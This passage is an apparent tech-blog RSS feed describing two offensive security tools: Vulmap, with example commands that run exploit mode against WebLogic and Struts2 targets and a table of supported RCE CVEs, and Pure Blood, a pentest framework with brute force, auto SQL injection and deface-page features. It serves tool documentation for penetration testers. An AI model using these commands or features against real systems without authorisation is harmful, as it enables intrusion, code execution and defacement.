–list Displays a list of vulnerabilities that support scanning<br />
–debug Debug mode echo request and responses<br />
–delay DELAY Delay check time, default 0s<br />
–timeout TIMEOUT Scan timeout time, default 10s<br />
–output FILE Text mode export (e.g. -o “result.txt”)</p>
<p class="has-text-align-center has-vivid-green-cyan-background-color has-background"><strong>Examples</strong></p>
<ul>
<li>Test all vulnerabilities poc mode</li>
</ul>
<p class="has-vivid-green-cyan-color has-black-background-color has-text-color has-background"><strong>python3 vulmap.py -u http://example.com </strong></p>
<ul>
<li>For RCE vuln, use the “id” command to test the vuln, because some linux does not have the “netstat -an” command</li>
</ul>
<p class="has-vivid-green-cyan-color has-black-background-color has-text-color has-background"><strong>python3 vulmap.py -u http://example.com -c “id” </strong></p>
<ul>
<li>Check <a href="http://example.com">http://example.com</a> for struts2 vuln</li>
</ul>
<p class="has-vivid-green-cyan-color has-black-background-color has-text-color has-background"><strong>python3 vulmap.py -u http://example.com -a struts2 </strong></p>
<p class="has-vivid-green-cyan-color has-black-background-color has-text-color has-background"><strong>python3 vulmap.py -u http://example.com -m poc -a struts2</strong></p>
<ul>
<li>Exploit the CVE-2019-2729 vuln of WebLogic on <a href="http://example.com:7001">http://example.com:7001</a></li>
</ul>
<p class="has-vivid-green-cyan-color has-black-background-color has-text-color has-background"><strong>python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729 </strong></p>
<p class="has-vivid-green-cyan-color has-black-background-color has-text-color has-background"><strong>python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729</strong></p>
<ul>
<li>Batch scan URLs in list.txt</li>
</ul>
<p class="has-vivid-green-cyan-color has-black-background-color has-text-color has-background"><strong>python3 vulmap.py -f list.txt </strong></p>
<ul>
<li>Export scan results to result.txt</li>
</ul>
<p class="has-vivid-green-cyan-color has-black-background-color has-text-color has-background"><strong>python3 vulmap.py -u http://example.com:7001 -o result.txt </strong></p>
<p class="has-text-align-center has-vivid-green-cyan-background-color has-background"><strong>Vulnerability List</strong></p>
<p>Vulmap supported vulnerabilities are as follows</p>
<pre class="wp-block-code"><code>+-------------------+------------------+-----+-----+-------------------------------------------------------------+
 | Target type       | Vuln Name        | Poc | Exp | Impact Version &amp;&amp; Vulnerability description                 |
 +-------------------+------------------+-----+-----+-------------------------------------------------------------+
 | Apache Shiro      | CVE-2016-4437    |  Y  |  Y  | &lt;= 1.2.4, shiro-550, rememberme deserialization rce         |
 | Apache Solr       | CVE-2017-12629   |  Y  |  Y  | &lt; 7.1.0, runexecutablelistener rce &amp; xxe, only rce is here  |
 | Apache Solr       | CVE-2019-0193    |  Y  |  N  | &lt; 8.2.0, dataimporthandler module remote code execution     |
 | Apache Solr       | CVE-2019-17558   |  Y  |  Y  | 5.0.0 - 8.3.1, velocity response writer rce                 |
 | Apache Struts2    | S2-005           |  Y  |  Y  | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce   |
 | Apache Struts2    | S2-008           |  Y  |  Y  | 2.0.0 - 2.3.17, debugging interceptor rce                   |
 | Apache Struts2    | S2-009           |  Y  |  Y  | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce         |
 | Apache Struts2    | S2-013           |  Y  |  Y  | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce        |
 | Apache Struts2    | S2-015           |  Y  |  Y  | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce        |
 | Apache Struts2    | S2-016           |  Y  |  Y  | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce          |
 | Apache Struts2    | S2-029           |  Y  |  Y  | 2.0.0 - 2.3.24.1, ognl interpreter rce                      |
 | Apache Struts2    | S2-032           |  Y  |  Y  | 2.3.20-28, cve-2016-3081 rce can be performed via method    |
 | Apache Struts2    | S2-045           |  Y  |  Y  | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce     |
 | Apache Struts2    | S2-046           |  Y  |  Y  | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce     |
 | Apache Struts2    | S2-048           |  Y  |  Y  | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce             |
 | Apache Struts2    | S2-052           |  Y  |  Y  | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce  |
 | Apache Struts2    | S2-057           |  Y  |  Y  | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce  |
 | Apache Struts2    | S2-059           |  Y  |  Y  | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce           |
 | Apache Struts2    | S2-devMode       |  Y  |  Y  | 2.1.0 - 2.5.1, devmode remote code execution                |
 | Apache Tomcat     | Examples File    |  Y  |  N  | all version, /examples/servlets/servlet/SessionExample      |
 | Apache Tomcat     | CVE-2017-12615   |  Y  |  Y  | 7.0.0 - 7.0.81, put method any files upload                 |
 | Apache Tomcat     | CVE-2020-1938    |  Y  |  Y  | 6, 7 &lt; 7.0.100, 8 &lt; 8.5.51, 9 &lt; 9.0.31 arbitrary file read  |
 | Drupal            | CVE-2018-7600    |  Y  |  Y  | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution          |
 | Drupal            | CVE-2018-7602    |  Y  |  Y  | &lt; 7.59, &lt; 8.5.3 (except 8.4.8) drupalgeddon2 rce            |
 | Drupal            | CVE-2019-6340    |  Y  |  Y  | &lt; 8.6.10, drupal core restful remote code execution         |
 | Jenkins           | CVE-2017-1000353 |  Y  |  N  | &lt;= 2.56, LTS &lt;= 2.46.1, jenkins-ci remote code execution    |
 | Jenkins           | CVE-2018-1000861 |  Y  |  Y  | &lt;= 2.153, LTS &lt;= 2.138.3, remote code execution             |
 | Nexus OSS/Pro     | CVE-2019-7238    |  Y  |  Y  | 3.6.2 - 3.14.0, remote code execution vulnerability         |
 | Nexus OSS/Pro     | CVE-2020-10199   |  Y  |  Y  | 3.x  &lt;= 3.21.1, remote code execution vulnerability         |
 | Oracle Weblogic   | CVE-2014-4210    |  Y  |  N  | 10.0.2 - 10.3.6, weblogic ssrf vulnerability                |
 | Oracle Weblogic   | CVE-2017-3506    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce       |
 | Oracle Weblogic   | CVE-2017-10271   |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce       |
 | Oracle Weblogic   | CVE-2018-2894    |  Y  |  Y  | 12.1.3.0, 12.2.1.2-3, deserialization any file upload       |
 | Oracle Weblogic   | CVE-2019-2725    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |
 | Oracle Weblogic   | CVE-2019-2729    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |
 | Oracle Weblogic   | CVE-2020-2551    |  Y  |  N  | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |
 | Oracle Weblogic   | CVE-2020-2555    |  Y  |  Y  | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce  |
 | Oracle Weblogic   | CVE-2020-2883    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |
 | Oracle Weblogic   | CVE-2020-14882   |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce     |
 | RedHat JBoss      | CVE-2010-0738    |  Y  |  Y  | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |
 | RedHat JBoss      | CVE-2010-1428    |  Y  |  Y  | 4.2.0 - 4.3.0, web-console deserialization any files upload |
 | RedHat JBoss      | CVE-2015-7501    |  Y  |  Y  | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |
 | ThinkPHP          | CVE-2019-9082    |  Y  |  Y  | &lt; 3.2.4, thinkphp rememberme deserialization rce            |
 | ThinkPHP          | CVE-2018-20062   |  Y  |  Y  | &lt;= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce  |
 +-------------------+------------------+-----+-----+-------------------------------------------------------------+</code></pre>
<p class="has-text-align-center has-vivid-green-cyan-background-color has-background"><strong>Docker</strong></p>
<p class="has-vivid-green-cyan-color has-black-background-color has-text-color has-background"><strong>docker build -t vulmap/vulmap .<br />
docker run –rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com</strong></p>
<div class="wp-block-buttons aligncenter">
<div class="wp-block-button is-style-outline"><a class="wp-block-button__link has-vivid-cyan-blue-background-color has-background" href="https://github.com/zhzyker/vulmap" target="_blank" rel="noreferrer noopener"><strong>Download</strong></a></div>
</div>
<p>The post <a href="http://kostacipo.stream/vulmap-web-vulnerability-scanning-verification-tools/">Vulmap : Web Vulnerability Scanning &#038; Verification Tools</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/vulmap-web-vulnerability-scanning-verification-tools/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Penetration Testing Framework – Pure Blood</title>
		<link>http://kostacipo.stream/penetration-testing-framework-pure-blood/</link>
					<comments>http://kostacipo.stream/penetration-testing-framework-pure-blood/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Thu, 07 Jan 2021 19:55:45 +0000</pubDate>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Wargames]]></category>
		<category><![CDATA[Penetration Testing Framework]]></category>
		<guid isPermaLink="false">http://kostacipo.stream/?p=2001</guid>

					<description><![CDATA[<p>Introduction Pure Blood is a Penetration Testing Framework intended for all hackers, pentesters, bug hunters and those that wants to get involved in pentesting and cybersecurity area. It’s simple tool, created for everyone who need help for daily pentesting tasks, such as information gathering (Whois, DNS Lookup, Reverse DNS Lookup, etc), vulnerability analysis, etc.&#160; &#160; [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/penetration-testing-framework-pure-blood/">Penetration Testing Framework – Pure Blood</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h3>Introduction</h3>
<div class="row">
<div class="col-lg-12">
<p>Pure Blood is a Penetration Testing Framework intended for all hackers, pentesters, bug hunters and those that wants to get involved in pentesting and cybersecurity area. It’s simple tool, created for everyone who need help for daily pentesting tasks, such as information gathering (Whois, DNS Lookup, Reverse DNS Lookup, etc), vulnerability analysis, etc.&nbsp;</p>
<div class="wp-block-image img-fluid text-center">&nbsp;</div>
<div class="alert alert-success">Penetration testing, also known as pentesting or ethical hacking, is the practice of testing a computer system, network/web application to find security vulnerabilities that an evil user (attacker) could exploit. Penetration testing can be automated with software apps/ programms, penetration testing frameworks or performed manually.&nbsp;</div>
<h2>Pure Blood v2:&nbsp;A Penetration Testing Framework created for Hackers</h2>
<p>This penetration testing tool is tested on Windows and Kali Linux, but should work on any Linux distro and OS X.</p>
<h2>Features</h2>
<h3>Web Pentest/Information Gathering</h3>
<div class="row">
<div class="col-12 col-lg-4">
<ul>
<li>Banner Grab&nbsp;</li>
<li>Whois&nbsp;</li>
<li>Traceroute&nbsp;</li>
<li>DNS Record&nbsp;</li>
<li>Reverse DNS Lookup&nbsp;</li>
<li>Zone Transfer Lookup</li>
</ul>
</div>
<div class="col-12 col-lg-4">
<ul>
<li>Port Scan&nbsp;</li>
<li>Admin Panel Scan&nbsp;</li>
<li>Subdomain Scan&nbsp;</li>
<li>CMS Identify&nbsp;</li>
<li>Reverse IP Lookup&nbsp;</li>
<li>Subnet Lookup&nbsp;</li>
</ul>
</div>
<div class="col-12 col-lg-4">
<ul>
<li>Extract Page Links&nbsp;</li>
<li>Directory Fuzz&nbsp;</li>
<li>File Fuzz&nbsp;</li>
<li>Shodan Search &nbsp;</li>
<li>Shodan Host Lookup</li>
</ul>
</div>
</div>
<div class="row">
<div class="col-12 col-lg-6">
<div class="alert alert-danger">
<h3>&nbsp;</h3>
<h3>Web Application Attack:</h3>
<ul>
<li>WordPress (WPScan, WPScan Bruteforce, WordPress Plugin Vulnerability Checker)</li>
<li>Auto SQL Injection</li>
</ul>
</div>
</div>
<div class="col-12 col-lg-6">
<div class="alert alert-success">
<h3>&nbsp;</h3>
<h3>Generator:</h3>
<ul>
<li>Deface Page&nbsp;</li>
<li>Password Generator</li>
<li>Text To Hash</li>
</ul>
</div>
</div>
</div>
<h3>Requirements:</h3>
<ul>
<li>Python v2/3</li>
<li>All from <code>requrements.txt</code> file: (<code>colorama</code>,<code> requests</code>, <code>python-whois</code>, <code>dnspython</code>, <code>bs4</code>, <code>shodan</code>)</li>
</ul>
<p>Modules can also be installed independently.</p>
<h2>Install</h2>
<p>Clone it form the Pure Blood GitHub repo:</p>
<pre class="wp-block-preformatted">$ git clone https://github.com/cr4shcod3/pureblood</pre>
<p>Then navigate to the Pure Blood directory and install modules (<code>requirements.txt</code>):</p>
<pre class="wp-block-preformatted">$ cd pureblood
$ pip3 install -r requirements.tx</pre>
<h2>Usage</h2>
<p>To start Pure Blood, run:</p>
<pre class="wp-block-preformatted">$ python3 pureblood.py</pre>
<pre class="wp-block-preformatted">██▓███   █    ██  ██▀███  ▓█████  ▄▄▄▄    ██▓     ▒█████   ▒█████  ▓█████▄                                                                                              
▓██░  ██▒ ██  ▓██▒▓██ ▒ ██▒▓█   ▀ ▓█████▄ ▓██▒    ▒██▒  ██▒▒██▒  ██▒▒██▀ ██▌                                                                                             
▓██░ ██▓▒▓██  ▒██░▓██ ░▄█ ▒▒███   ▒██▒ ▄██▒██░    ▒██░  ██▒▒██░  ██▒░██   █▌                                                                                             
▒██▄█▓▒ ▒▓▓█  ░██░▒██▀▀█▄  ▒▓█  ▄ ▒██░█▀  ▒██░    ▒██   ██░▒██   ██░░▓█▄   ▌                                                                                             
▒██▒ ░  ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█  ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓                                                                                              
▒▓▒░ ░  ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓  ░░ ▒░▒░▒░ ░ ▒░▒░▒░  ▒▒▓  ▒                                                                                              
░▒ ░     ░░▒░ ░ ░   ░▒ ░ ▒░ ░ ░  ░▒░▒   ░ ░ ░ ▒  ░  ░ ▒ ▒░   ░ ▒ ▒░  ░ ▒  ▒                                                                                              
░░        ░░░ ░ ░   ░░   ░    ░    ░    ░   ░ ░   ░ ░ ░ ▒  ░ ░ ░ ▒   ░ ░  ░                                                                                              
            ░        ░        ░  ░ ░          ░  ░    ░ ░      ░ ░     ░                                                                                                 
                                        ░                            ░                                                                                                   
&nbsp;    --=[ Author: Cr4sHCoD3                     ]=--                                                                                                                     
| -- --=[ Version: 2                            ]=-- -- |                                                                                                                
| -- --=[ Website: https://github.com/cr4shcod3 ]=-- -- |                                                                                                                
| -- --=[ PureHackers ~ Blood Security Hackers  ]=-- -- |


[ PureBlood Menu ]

     01) Web Pentest / Information Gathering
     02) Web Application Attack
     03) Generator
     99) Exit

PureBlood&gt;</pre>
<p>Usage is very simple. Just choose an option, pick the target and follow the instructions.&nbsp;</p>
<h3>Web Pentest/Information Gathering Example:</h3>
<p>Choose Web Pentest from menu:</p>
<pre class="wp-block-preformatted">PureBlood&gt; 1
[ Web Pentest ]
   01) Banner Grab
   02) Whois
   03) Traceroute
   04) DNS Record
   05) Reverse DNS Lookup
   06) Zone Transfer Lookup
   07) Port Scan
   08) Admin Panel Scan
   09) Subdomain Scan
   10) CMS Identify
   11) Reverse IP Lookup
   12) Subnet Lookup
   13) Extract Page Links
   14) Directory Fuzz
   15) File Fuzz
   16) Shodan Search
   17) Shodan Host Lookup
   90) Back To Menu
   95) Set Target
   99) Exit

PureBlood (WebPentest)&gt;</pre>
<p>Then&nbsp;select one of the options, and set the target:</p>
<pre class="wp-block-preformatted">PureBlood (WebPentest)&gt; 2

PureBlood(WebPentest)&gt; 95
[#] - Please don't put "/" in the end of the Target.
PureBlood&gt;WebPentest&gt;(Target)&gt; www.google.com</pre>
<p>Result:</p>
<pre class="wp-block-preformatted">"domain_name": [
    "GOOGLE.COM",
    "google.com"
  ],
  "registrar": "MarkMonitor, Inc.",
  "whois_server": "whois.markmonitor.com",
  "referral_url": null,
  "updated_date": [
    "2018-02-21 18:36:40",
    "2018-02-21 10:45:07"
  ],
  "creation_date": [
    "1997-09-15 04:00:00",
    "1997-09-15 00:00:00"
  ],
  "expiration_date": [
    "2020-09-14 04:00:00",
    "2020-09-13 21:00:00"
  ],
  "name_servers": [
    "NS1.GOOGLE.COM",
    "NS2.GOOGLE.COM",
    "NS3.GOOGLE.COM",
    "NS4.GOOGLE.COM",
    "ns4.google.com",
    "ns2.google.com",
    "ns1.google.com",
    "ns3.google.com"
  ],
  "status": [
    "clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited",
    "clientTransferProhibited https://icann.org/epp#clientTransferProhibited",
    "clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited",
    "serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited",
    "serverTransferProhibited https://icann.org/epp#serverTransferProhibited",
    "serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited",
    "clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)",
    "clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)",
    "clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)",
    "serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)",
    "serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)",
    "serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)"
  ],
  "emails": [
    "abusecomplaints@markmonitor.com",
    "whoisrelay@markmonitor.com"
  ],
  "dnssec": "unsigned",
  "name": null,
  "org": "Google LLC",
  "address": null,
  "city": null,
  "state": "CA",
  "zipcode": null,
  "country": "US"
}</pre>
<h3>Web App Attack Example:</h3>
<figure class="wp-block-image"><a href="https://asciinema.org/a/193578" target="_blank" rel="nofollow noopener"><img decoding="async" class="wp-image-4433 lazyloaded" src="https://cdn.cyberpunk.rs/wp-content/uploads/2018/12/we_app_attack_example.jpg" sizes="(max-width: 1000px) 100vw, 1000px" srcset="https://cdn.cyberpunk.rs/wp-content/uploads/2018/12/we_app_attack_example.jpg 1000w, https://cdn.cyberpunk.rs/wp-content/uploads/2018/12/we_app_attack_example-300x160.jpg 300w, https://cdn.cyberpunk.rs/wp-content/uploads/2018/12/we_app_attack_example-768x409.jpg 768w, https://cdn.cyberpunk.rs/wp-content/uploads/2018/12/we_app_attack_example-500x267.jpg 500w" alt="PureBlood Web Attack Example" data-srcset="https://cdn.cyberpunk.rs/wp-content/uploads/2018/12/we_app_attack_example.jpg 1000w, https://cdn.cyberpunk.rs/wp-content/uploads/2018/12/we_app_attack_example-300x160.jpg 300w, https://cdn.cyberpunk.rs/wp-content/uploads/2018/12/we_app_attack_example-768x409.jpg 768w, https://cdn.cyberpunk.rs/wp-content/uploads/2018/12/we_app_attack_example-500x267.jpg 500w" data-src="https://cdn.cyberpunk.rs/wp-content/uploads/2018/12/we_app_attack_example.jpg" data-sizes="(max-width: 1000px) 100vw, 1000px"></a><figcaption>Web Application Attack Usage Example (DEMO)</figcaption></figure>
<div class="row justify-content-center mb-3">
<div class="col-lg-4">
<figure><a href="https://github.com/cr4shcod3/pureblood" target="_blank" rel="nofollow noopener">Download Pureblood</a></figure>
</div>
</div>
</div>
</div>
<p>The post <a href="http://kostacipo.stream/penetration-testing-framework-pure-blood/">Penetration Testing Framework – Pure Blood</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/penetration-testing-framework-pure-blood/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
